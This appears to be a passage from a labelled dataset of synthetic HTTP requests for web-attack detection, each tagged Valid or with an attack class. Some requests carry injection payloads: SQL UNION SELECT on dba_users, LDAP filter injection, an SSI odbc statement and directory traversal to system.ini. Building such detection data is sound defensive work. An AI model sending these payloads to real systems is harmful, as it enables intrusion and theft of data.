~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45492
Start - Id: 9957
class: Valid
GET /rgvTBqN3Z.asp? HTTP/1.1
Host: 99.173.45.185
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: yvSo-a1ekTo;q=0.3, dtze-tmSTiutm;q=0.5
Cache-Control: no-store
Client-ip: 150.172.121.230
Cookie: fdur=l3 UtoNr;son2cW=7
Cookie2: $Version="573"
Date: Thu, 23 Jun 05 04:14:07 CET
ETag: "PUflyuOYPUtmFuwJnsOF"
Expect: 100-continue
From: snyou@r8tka9etrf.de
If-Modified-Since: Thu, 29 Nov 07 11:34:58 UTC
If-Unmodified-Since: Wed, 17 Feb 10 15:54:48 CET
If-Match: "esqB6rJIKT3HRXw6AJ1"
If-None-Match: "fu2NLoCyVFXxc_uJEG7"
If-Range: "qXykQRUnNrnscKbB"
Max-Forwards: 197
MIME-Version: 9.2
Pragma: tnrlghfi=e
Proxy-Authorization: Digest nonce
Authorization: Basic Rm9pb0lsODp6aHNvNQ==
Range: -96
Referer: /nelsjs2/c6lreo/wwsaesoy/nrnre/eheoo.nsf
TE: chunked;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 3.8; tr-ne; rv:2.5.1) Gecko/81213590
UA-CPU: 68000
UA-Disp: 042,750,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 596x007
Via: HTTP/2.0 www.xe8zsyL.js, dte/6.0 www.aihr.htm:35
Transfer-Encoding: compress
Upgrade: EIecm6/9.9, iperio/2.0, nea/8.0, testdg/7.3, TvsW/8.2
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 36.77.211.44
X-Serial-Number: 939778978647707
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9957
Start - Id: 10894
class: Valid
GET /ykn/formL@homeJuR/xrTcehfthfsair2p/a7KZcu9.6NxRk/0libtsock_streamcrbVbo/yiaLdymne/fadormdtal/eGOYTAKjm1nyljG/enaasulina9dest/aqMuus8yMyHEKtptaGh/3RnLyTwYt33Pd4pGZ4/ssoic2.jpg?leExamnzpHls=tmio%24Di%26+&ustedmte=8902 HTTP/1.1
Host: 225.23.93.185
Connection: 02nr6h
Accept: video/*;q=0.3, application/*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: kiaamo-elaeica;q=0.3, eurefnru-a;q=0.8
Cache-Control: max-age=26
Client-ip: 154.30.238.254
Cookie: igoshuj911dsu=3685;likeLDbRP=12973
Cookie2: $Version="5"
Date: Wed, 05 Apr 06 17:49:14 UTC
ETag: W/"H7IrqR3HHE8Zo6u5Q2bJ"
Expect: 100-continue
From: 9Ytl@niohHlSiyq.uk
If-Modified-Since: Thu, 24 Mar 05 04:01:20 CET
If-Unmodified-Since: Wed, 30 May 07 01:05:39 CET
If-Match: *
If-None-Match: *
If-Range: "Yyrp_5bJfkj_hu9yG7W"
Max-Forwards: 496
MIME-Version: 3.0
Pragma: Nn='shv'
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: 1xtIss Nhem=leul
Range: 7-
Referer: http://www.saVxss8.com/tosgAeae/eDlet/lhenl.gif
TE: chunked
Trailer: Accept-Language
User-Agent: oecl (i30s6O; r_yLgE)
UA-CPU: PowerPC
UA-Disp: 8078,065,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 488x175
Via: FTP/3.2 www.8ioc5.jpg, FTP/1.0 www.to5ts.gif, FTP/1.6 97.148.239.98
Transfer-Encoding: gzip
Upgrade: zitfn/8.6, ijcqg/4.3
Warning: 613 www.Aryigoac.js "2cEetAr" 
X-Forwarded-For: 250.170.187.7
X-Serial-Number: 70193457062638076597
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10894
Start - Id: 27281
class: Valid
GET /d5_P49HlNgr/8esoluadt2aisw/rY7vAE33KY79Pr502f/avgtmiayogo/e-S-ljjVNUE_/hefxBfMIvn/HoyautoexecCW/l7QXs2FJwLpkN0bEq/gncb/oyh5zCfKLBgAMUHb.swf?pw3e8yaasncnf=rfse+ethdhO3pdi&ttds8Ni=b%26services&o8syrom=dlfeebt0ed6Ce3&fMUxeohrlih7=2050&Reipa1afaia=9466168067&bcmp=iotiNwRsbEolrdfTte&hdest=323831&7zejesi2oBar=s%7Erbtne4Sdelete&p8OSesAS=ac4%3E&xnuaEcaralta=4639&lQmV7=stmRemuwaa&ohauirnmB=908163&Aiea=ia%5D&cainnat3u=sjD.uRmk HTTP/1.1
Host: 30.189.208.100
Connection: dqIha
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.54.145.217
Cookie: cEriftfitth8sni=wWwptxhnhFm9;HTo=t8t3kRe9i9hlhlt;exiNYsa=3092449;O8d=gwM-XY6LCI;1Osv2eRmmH=bMN6dkO5UALN;rreIkusreuhW=Ntjnb
Cookie2: $Version="874"
Date: Wed, 21 Apr 10 11:56:57 UTC
ETag: "DmUGWHQT6l3fwST"
Expect: bA0obtea=tHrYeoee;ioPneR
From: Dt21hm@sbe22sjbhs.com
If-Modified-Since: Wed, 25 Jun 08 21:19:48 GMT
If-Unmodified-Since: Tue, 13 Apr 04 09:37:05 UTC
If-Match: *
If-None-Match: "a4AuocEA3O_Fe7w"
If-Range: Wed, 05 Jul 06 18:08:37 CET
Max-Forwards: 941
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest username="4arjfzEs"
Range: 392-,66898-,-0761
Referer: http://www.mXcvoi.org/0e7h7i.nsf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 0.5; Da-co; rv:8.4.2) Gecko/09173498
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6912x6352
Via: 1.5 173.139.101.200:95101
Transfer-Encoding: deflate
Upgrade: rQ2sO/0.1, ote/0.2
Warning: 238 180.27.15.55 "t7r8dlbisjtoofgu" "Tue, 07 Feb 06 13:03:45 CET"
X-Forwarded-For: 174.19.75.112
X-Serial-Number: 75164077038098175
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27281
Start - Id: 23983
class: Valid
GET /w9Ir/VIC_dq-ya/oUswRb/peooium1xlipaey5laE/th/ZGXKlike0ZHZ3hkv/iO/tC7JR5o/n5B8uplY/vhttpY/srshsOepe/ea9os.shtml? HTTP/1.1
Host: 87.127.246.231
Connection: erberdle
Accept: application/rtf;q=0.3
Accept-Charset: euc-jp, iso-8859-4;q=0.8, iso-8859-2;q=0.9
Accept-Encoding: identity, deflate;q=0.5, gzip
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 98.45.103.252
Cookie: Tli=ikYM0BI4lpP;VA5AT=8848;0aDDU=6;hsRe=235653;rannoet7t=85906506;efMrlWjaQ=bn
Cookie2: $Version="6"
Date: Sun, 07 Dec 08 04:31:20 GMT
ETag: W/"S8SpMd3ksau@hp111U_"
Expect: 100-continue
From: ekroc@eahuBenl.uk
If-Modified-Since: Wed, 26 Jul 06 06:24:06 UTC
If-Unmodified-Since: Fri, 14 Apr 06 21:32:56 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5927
MIME-Version: 7.7
Pragma: c=tdmleeO
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: Digest nonce
Range: 57-083666,74376-4577,088-
Referer: /xoyos7m/ahbe/niez8hm.tar.gz
TE: trailers,deflate,chunked
Trailer: Expect
User-Agent: eehp2csnfu (sS-Z@Fgnq; i.rkJ22; o4HwOw92n; f39eEA; aCZhpa)
UA-CPU: StrongARM
UA-Disp: 862,451,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9462x9144
Via: 4.3 www.lfO25qni.css, 3.0 www.g7eeCTt.gif:642, 8.3 www.pya0v.htm
Transfer-Encoding: compress
Upgrade: 1in2/8.8
Warning: 097 www.wrfc.jpeg "otniol0w" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23983
Start - Id: 27111
class: Valid
GET /at/sxQ486fZggU/kMAiTt._uZrwW/BhHt4jbcnhhbFi7mnerh/aghoy1Dnwgdtttrsga4p/na1/0brrt93amcI3e8ldxr/lUgFDa7PX.php3?8He=rgs%26eDh4e3mu+&divYzxp-yprocessing-instructionE3K=3NRlstyleio&L69asOecsUf=13873977&frrdtrisot=OtDspa&aeheptawe=l3oMW6&pssn9NT6w=12317617&aeelAUnOkTot1w=weiE6J&sn6rweeo=aqOs2aXyz6c6&hlsaha=354004 HTTP/1.1
Host: www.sdNTe.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.5, windows-1257;q=0.4, iso-8859-7, iso-8859-8-i
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: max-stale=91866
Client-ip: 33.122.90.124
Cookie: kraEHtEld=D2e;ihtspWi=24r/3g%hsoetnet;hRjt-=eUoHtFvdv;njedlpjeTi=83428461;enimctEn0K0itga=ercs;hn=iaqir4hoEtmpjhtpassr
Cookie2: $Version="926"
Date: Sat, 20 Jun 09 13:55:45 GMT
ETag: "Zraz.1dsGJK0I4nHIhp"
Expect: 100-continue
From: hhafeiO@hshvl.net
If-Modified-Since: Sat, 19 Feb 05 20:17:56 CET
If-Unmodified-Since: Fri, 30 Nov 07 06:28:40 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Feb 08 06:03:13 GMT
Max-Forwards: 5
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic VHRjb25UcTp0Z2VtY3Q=
Authorization: Digest realm
Range: -597,1-,-978584
Referer: /Rrsdoto/0ehe/ifanho.pl
TE: chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/9.1 (compatible; Konqueror/1.6; Open BSD i386; hwnfo; ht02ysts; hmOqfosadl)
UA-CPU: Sparc
UA-Disp: 724,7981,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 419x0757
Via: ietis/9.0 213.206.77.166, 0.9 www.DtIatsbi.jpeg
Transfer-Encoding: gzip
Upgrade: n69/4.0, e0im/7.8, aene/5.3, mph/0.9, eeemie/5.5
Warning: 361 33.94.112.30 "aaityoctToiledbg" "Sun, 07 Sep 08 12:23:37 GMT"
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 7609698
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27111
Start - Id: 42290
class: SqlInjection
GET /nAfnr0/jrnn/MNaloxm/M1FFsISaFinputhtacces/dRo/oeO6I/jLZqTdo-gxWbJ/tt/cdsxupabs4coidaud/uC5q/Zx1G.waLperl.9Mvvnetcat.htm?@JPdGbnqYlusrb=640&eErirnndd=eear+&nDcohto1=chairs%27+++UNION+++SELECT+++++oKtoonr4o++++FROM+dba_users+++++WHERE+name+like++++%27%2525&hn=t6+%29rt&oahdhhnowipeoae=bw&t5oaoiEozoMpddd=012186&r5NB=emeeiod5eh&wtbbmn=42609583&hl=450902&l7ibinelDjefbj=XcdWvb5f&steogreaieyara5=N%24rxdrtabLd2%3Ere&ctT8lheed=mIWsO-f_yEjC&6edaeiaao=3 HTTP/1.1
Host: 1.70.140.215
Connection: keep-alive
Accept: audio/basic, audio/*, image/gif
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.0, compress, identity;q=0.0
Accept-Language: ninn-io4edlat, edLn-fahds;q=0.4, stvr-Gc;q=0.2, ecshtev-ibs7tr2
Cache-Control: min-fresh=956
Client-ip: 87.181.200.43
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Tue, 05 Apr 05 17:11:27 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 23 Dec 09 16:13:25 UTC
If-Unmodified-Since: Sat, 18 Apr 09 19:58:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.3
Pragma: pSuwoac=llhs2erX
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: /eatqes/lzrb27/glcsiaoe/7wtilieu.mspx
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: uauan/5.5
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 443x7648
Via: 7.1 www.yt8ae.html, 5.1 www.Elp98pse.png, oen/3.9 www.rfere.jpeg
Transfer-Encoding: compress
Upgrade: lr2rr/2.7, aetd/1.2, tei/7.3, tgOeft/0.3, Ozehbn/5.9
Warning: 539 www.diea.jpeg "Aotyhee" "Sun, 01 Feb 09 21:46:05 GMT"
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 0737501888973
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42290
Start - Id: 3723
class: Valid
GET /lG1MJ6_1HxuYMSH/MzXMhnodem/nrjw/esteiuriBlr/eKXcukXsZGyn/ltEraHb/nlhnopie2duqxTi/o8sdo7mEpbh/ynI_oQ3W3/xrdnprsholertesd/eeggaeadrp/dVLzroHmp@E.js?otas=tbrm&usmocha%uTSncD0=76311&mYesiufanuseo=axtybetgs%7E&N9sdbHa=hssO0NrgO2&uemsrNt=%3Dhdof4tt%3Bainsertso+Y+4a&5lCac=%3Auvnsystemt&l8nayeheiksMo=081540&h5xvrhie9l=64940&srun1b=slhtaccesvs&arBoqsEo=eY&vPhdm=larl1sOnsbt HTTP/1.0
Host: www.htnRcGkbM.it:42740
Connection: hiWei6
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ratdn-nuD;q=0.4
Cache-Control: no-transform
Client-ip: 87.85.120.176
Cookie: wiee=9ao;Upr7s=lalt;teSeniha=891;qcopyj.O.KT=0s0
Cookie2: $Version="8"
Date: Sun, 31 May 09 05:02:52 UTC
ETag: "SEp1TwK1cUkWwLx6Ebdr"
Expect: fode9i=sotm
From: bTuG@sunaTo.gov
If-Modified-Since: Thu, 26 Feb 04 12:21:45 UTC
If-Unmodified-Since: Wed, 21 Nov 07 07:00:42 GMT
If-Match: "4zp-VPDzG@zWoMe5g"
If-None-Match: "Q.DsZy_qQBPtRs7KrwNP"
If-Range: *
Max-Forwards: 065
MIME-Version: 0.4
Pragma: ne5='ldhao'
Proxy-Authorization: Nsot sthssEoE=ooht9
Authorization: 9rrtH lwe2fsr=lyi2gi
Range: 355373-92094,2954-
Referer: http://an2eMrki.gov/tfl57/nnrA/ouer/slrish/nbnrYr.mdb
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: yA1OB__D http://www.salehih.st
UA-CPU: PowerPC
UA-Disp: 7385,2023,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0475x7705
Via: 8.6 8.254.2.183:74, 3.4 www.miiAopi.shtml:08612
Transfer-Encoding: compress
Upgrade: gsllay/9.9, kj6hn/8.2
Warning: 281 36.243.253.191 "hxpehuhbsrd4egeo" 
X-Forwarded-For: 95.113.101.82
X-Serial-Number: 6563361501222
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3723
Start - Id: 3460
class: Valid
GET /hy.php?oepswoyp=32&63imOnrmg0=iadeVerrCacIzR&aelEfMdtoe=ezY&heyrginodso=ll%40dghdT&catv2WQimgls@MGIc=07WbASqiXB&5documentjG6TEl=4&elaDgadeNt=Nimgn%3Bs%7Cart&te=2&eo=r5ian%28m2o%5Bcu HTTP/1.0
Host: www.ehesrias.com
Connection: epcetet
Accept: text/xml
Accept-Charset: macintosh;q=0.0, iso-8859-3, isiri-3342;q=0.8, x-mac-ce;q=0.7
Accept-Encoding: 
Accept-Language: a-stm, W4bssg1k-rtoe;q=0.9
Cache-Control: only-if-cached
Client-ip: 101.68.144.153
Cookie: sgwr=0asgeeuId2ohbwye7;sboEuxeimnha=u;nss= ;n2om0rit26mt=rtds2eyt6byp24udt8;Qx6=84
Cookie2: $Version="0"
Date: Thu, 04 May 06 07:51:12 UTC
ETag: "AN4.nNkM_srLbHg"
Expect: qsthsn
From: 4aSoxaoo@yges.it
If-Modified-Since: Sun, 10 May 09 02:37:04 CET
If-Unmodified-Since: Fri, 07 May 04 15:42:23 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Jul 08 20:57:40 UTC
Max-Forwards: 982
MIME-Version: 0.0
Pragma: maulgmh='hfwtm'
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: 0Yyaa4 eefl=sh9s0r3n
Range: -535,169-
Referer: http://h2aY2.be/tkstr/tmau/cEohrlm/drnrm1w6.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: 3tabnltetWplypeia2t
UA-CPU: MIPS
UA-Disp: 086,5443,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8177x498
Via: 1.0 www.urfe.css, FTP/3.9 207.227.198.235
Transfer-Encoding: compress
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 418 www.2tqbes.html "2mrk" "Wed, 11 Mar 09 16:10:04 GMT"
X-Forwarded-For: 213.11.191.135
X-Serial-Number: 1870735508221770189
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3460
Start - Id: 14409
class: Valid
GET /ySOJ.php4?0EMxmlmetaDps7frW=054854&anxl3otryetsj=tmknXkfA&5iulio1ph=oU_0j9302&CnMs=Gq&Eclew8eRplhn=4&IcseeeuOo4Nksh=%25u1toe0ftoMqesy&GPyRQ1=ul+hf&onEiSm8arw=n%401&geeorshu7sS8=93831&6catfkKLidpg=6eqgrcp&eepra2=9&ha=se2eeu&rpcwdra=ssask%5Datraaeu HTTP/1.1
Host: 146.95.96.46:3
Connection: o2eM
Accept: audio/*
Accept-Charset: windows-874;q=0.6, x-mac-roman;q=0.2, x-mac-chinesesimp;q=0.1
Accept-Encoding: identity;q=0.2, identity, gzip, compress
Accept-Language: i-nodoo;q=0.7, 8as-xnbqeo, eepCcyt-7ye
Cache-Control: only-if-cached
Client-ip: 13.103.41.0
Cookie: nMy=h\null&n0beef:;sanhl=6;nrunmtpn=914;WU_TCDehknG=b5hdimgiaEmheGdut
Cookie2: $Version="69"
Date: Wed, 25 Nov 09 02:31:53 GMT
ETag: W/"giup2LbAzDOVuQQqvsP"
Expect: lett
From: Rt7eei@haruek9a0.st
If-Modified-Since: Mon, 10 Jul 06 11:58:57 CET
If-Unmodified-Since: Tue, 02 Oct 07 09:23:36 GMT
If-Match: "u3k@jgve4d6vAaEKUtD"
If-None-Match: "-MQURPsVCzXQJBvEF67."
If-Range: Tue, 11 Jan 05 01:13:57 GMT
Max-Forwards: 43
MIME-Version: 0.0
Pragma: m='n95zakna'
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: xdtau tda4=OtsEo3
Range: -5585
Referer: http://niloedui.st/cilyHEa.msf
TE: deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.3 (Windows; U; Win 9x 2.6; ss-o6; rv:7.2.4) Gecko/88809994
UA-CPU: StrongARM
UA-Disp: 769,941,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 7.2 www.wur8z.htm, FTP/4.6 63.62.19.229
Transfer-Encoding: identity
Upgrade: eniee/9.3, 4smn/9.1, wsS/1.8
Warning: 995 www.tyeo.tiff "emterf" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14409
Start - Id: 38947
class: LdapInjection
GET /ertHtx/dN0w54pRoonedraha/yn1wxueaUns/hbgwswr/eth1sltpi.htm?rsymN8roN=8364&Mv8Qls5o06H=39595491&im=hci5a%29%28%26%28objectClass%3D++o1a*%29&ynit=i&eardahm=etyoRh&cf=0omaacceptn%29tpn+htacces20dh&betf2b=rtwifaocmaen71&0Pitiej=n6%26dainceUi%3A+&i4zw6u=53&tnnewneelhisetL=9&edccarov6i=O7oer9bgsoundeoTb&ryihfe3oEa2tsby=ibuth&rnyao=v HTTP/1.1
Host: www.ngerIs5he.uk
Connection: d8ygeo
Accept: video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eantTes3-ot, u-r, ocenaa-sx, wnetkln-nmgd
Cache-Control: no-cache
Client-ip: 15.183.96.232
Cookie: o6dor0ese=Eeltngue3ulwnh;MqAsystemk8CI=svnALMwTN;Vd27=y;uetrEiaonr=Swr=o4td<me atx wl;e9srMrr=07
Cookie2: $Version="84"
Date: Thu, 24 Jan 08 11:17:10 UTC
ETag: "WKPLBEw6tCGAk9Pt"
Expect: fechde
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 13 Jan 05 12:06:02 GMT
If-Unmodified-Since: Fri, 23 Dec 05 24:48:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 19115-,-68,486-99
Referer: /biduke6r/armh/fpiuiOs/ccneowR.pl
TE: trailers,chunked,gzip;q=0.1
Trailer: From
User-Agent: rktejinh/4.3.0.8
UA-CPU: 68000
UA-Disp: 4990,2701,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: 6.1 www.fnnles.html:56082
Transfer-Encoding: compress
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 766 39.53.21.205 "etnwdeh" "Thu, 10 Nov 05 22:23:35 UTC"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38947
Start - Id: 40968
class: SSI
POST /trnfewi2snntd5aee/blR/6aenssEbn/eanz/WfselectoorXbinupdate@7wFA/gtEnw9s.js? HTTP/1.0
Content-Length: 7
Content-Encoding: deflate
Content-MD5: bGFyemloaWxlZXlzbWZlcA==
Content-Type: application/x-www-form-urlencoded
Host: 194.180.31.228:80
Connection: ayot
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cookie: e3etTsPnO44a9=cpm';mochailogKfo=200;ua=<!--  #odbc statement=  "select  aes,   0a5,    idla7ie   from     toaT0iptha    order    by  9,  25, 8"     -->
Date: Sat, 22 Apr 06 24:55:51 GMT
Max-Forwards: 08
Referer: http://www.tdrt.gov/dtriob/hcarno6/obiki.cgi
User-Agent: Mozilla/8.6 (compatible; eunttol; Linux i586; hhir; t2eaYah)
UA-Pixels: 2288x636
Via: FTP/5.4 209.31.193.150, 0.3 www.w8dtaem.jpg
Upgrade: teiRtq/9.0, U7ain/5.4
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

beo=388

End - Id: 40968
Start - Id: 21558
class: Valid
GET /d51VC8gvjK/d0inatfb.sh?ld6eeCaN5=efU+ct0wswas&etn=hTeOeeiAOeEk&otteseePo=eeird&lt=s5tnont05Ereisfee&bnatEmasdTtty=y8&aoyms8tNnal=e6&tmmiyy7isseiho=939660&gd=aPmdC-ni3I&ihsoltS=arFfdttstin&ifoc2r3sostylax=llc%2F%5D&ismitrwteou=0bpvtoodubeawn HTTP/1.1
Host: www.arOdeh.ch
Connection: tlne
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.7
Accept-Language: tYiRuu-Eskcw;q=0.8, gs-stsa4
Cache-Control: max-age=5
Client-ip: 4.208.204.122
Cookie: iat=f
Cookie2: $Version="538"
Date: Mon, 16 Jan 06 20:06:20 CET
ETag: "6f2cLNot6QMnSrx"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Tue, 08 Sep 09 22:19:30 CET
If-Unmodified-Since: Fri, 17 Jun 05 01:18:23 CET
If-Match: "9dfAun-3oNZ4Cv.qUg0b"
If-None-Match: "eIThuy89ijPH-Ont"
If-Range: "d6B9R-.GF8HG31Z"
Max-Forwards: 436
MIME-Version: 9.4
Pragma: g='tdxniIs'
Proxy-Authorization: Digest qop=auth
Authorization: jlar aIipR4ul=htd7
Range: -25
Referer: http://www.cEeeoxen.biz/is6s/ufrn/attEiRrI/7ueeesm.jsp
TE: trailers
Trailer: Warning
User-Agent: esialy (rlSXDZMD)
UA-CPU: PowerPC
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0542x2765
Via: 9.9 219.37.34.48:99131, HTTP/3.4 www.i5nem3.htm, HTTP/9.4 159.137.139.14
Transfer-Encoding: compress
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 40.222.86.185
X-Serial-Number: 42015
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21558
Start - Id: 45896
class: PathTransversal
GET /yDX5vDpT/6ac8slIinnehibtnhxdr/ruealtyaoqhsnsset9u/rlcBp92bjbsF/bKyv6CFT/rvsietd/skGZetcd/UH8QH6logO2Y6JO/JtH_DNbqUPm.shtml?ltnWnloaakut=usr+&UOMJPvPI=hsf&ggEdx4UKfformv8=22385452&eottwEaxi05t=tl8phgtg81f&tBy=45&3f=628030441&l5UlmeasZ=a%40l&eaptlcsaph1=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&gm=ddrop7oe73delete1O&dwtiaLt1iiidi=systemtt0&eQKF2Syx_UQ=%25bte HTTP/1.1
Host: www.lItdI2ueyt.gov
Connection: keep-alive
Accept: image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 191.79.240.211
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="33"
Date: Fri, 09 Feb 07 13:29:14 UTC
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: NkanyTe@uhoerre.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Thu, 18 Jun 09 17:18:34 CET
If-Match: "DChR2DoxsG6crIf5jM"
If-None-Match: "Pr_hjPmTBH612LKRHB"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 24
MIME-Version: 5.1
Pragma: vfOyrte='alwkded'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: /2e3st/ntbbs5F/0N5S.nsf
TE: trailers
Trailer: TE
User-Agent: afhetth0auaspauttxen
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: 7.3 www.rouer.png
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 447963296121692
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45896
Start - Id: 5570
class: Valid
POST /0exuuE/teoten0f35o3ciyh.php4? HTTP/1.1
Content-Length: 18
Content-Language: ctxz,a1yshg,enodUlr
Content-Encoding: compress
Content-Location: /pc0D.asp
Content-MD5: aWgzdTZpTGhvUjVvZ29ubg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Nov 05 13:23:32 GMT
Last-Modified: Thu, 21 Aug 08 24:26:58 CET
Host: www.Pget.org
Connection: ulEna9
Accept: application/rtf, video/quicktime, text/*;q=0.4
Accept-Charset: gb2312;q=0.6, x-mac-arabic;q=0.9, x-mac-chinesesimp, iso-8859-9, euc-jp
Accept-Encoding: gzip, compress, gzip;q=0.4, compress;q=0.5
Accept-Language: ezfTo-dtBo, seteooT-keir, 5y-enafn;q=0.0
Cache-Control: v=di
Client-ip: 191.224.243.87
Cookie: aopdxcshnmTu=isdechieeetp;Azdthp=423892;4r9M614jH=as2X;nreRh6nn=uI;eec=018
Cookie2: $Version="811"
Date: Sat, 13 Dec 08 13:52:15 GMT
ETag: "9XN.dYXVv97zHjhTbu"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Fri, 09 Jan 09 19:17:58 CET
If-Unmodified-Since: Thu, 17 Jan 08 05:11:15 CET
If-Match: "KlcqpPxg59s5fCY"
If-None-Match: *
If-Range: Mon, 24 Aug 09 10:36:33 GMT
Max-Forwards: 5023
MIME-Version: 8.0
Pragma: qtgnd='tirDeiI'
Proxy-Authorization: Digest realm
